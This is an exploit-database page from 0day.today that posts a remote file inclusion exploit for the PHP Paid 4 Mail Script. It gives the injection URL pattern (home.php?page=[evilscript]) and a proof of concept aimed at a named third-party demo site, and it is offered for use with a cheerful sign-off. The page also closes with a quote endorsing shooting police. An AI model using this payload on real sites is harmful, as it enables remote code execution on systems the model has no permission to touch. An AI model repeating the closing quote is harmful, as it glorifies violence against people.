[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln

Author
int_main();
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5554
Category
web applications
Date add
26-07-2009
Platform
unsorted
=================================================================
PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln
=================================================================


_______         ___________
\   _  \ ___  __\_   _____/
/  /_\  \\  \/  /|    __)  
\  \_/   \>    < |     \   
 \_____  /__/\_ \\___  /   
       \/      \/    \/    
                       #ruling the web since 9/2008


  [=] PHP Paid 4 Mail Script File Inclusion vuln
       
       Script   : PHP Paid 4 Mail Script 
       Download : http://www.shop-020.de/phpscriptat-p25h4s5-PHP-Paid-4-Mail-Scri.html
       Author   : int_main();
       Greez    : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs
      


       Exploit:

       http://[target]/home.php?page=[evilscript]

       POC:

       http://www.city-demo.at/mail/home.php?page=http://google.de

       (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.)

       Have phun, wui!

  [=]     
       "Wir sagen naturlich, die Bullen sind Schweine, wir sagen, der Typ in Uniform ist ein Schwein, das ist kein Mensch, (...) 
       und naturlich kann geschossen werden!" (Ulrike Meinhof, 1970)" 
  [=] 



#  0day.today [2024-12-25]  #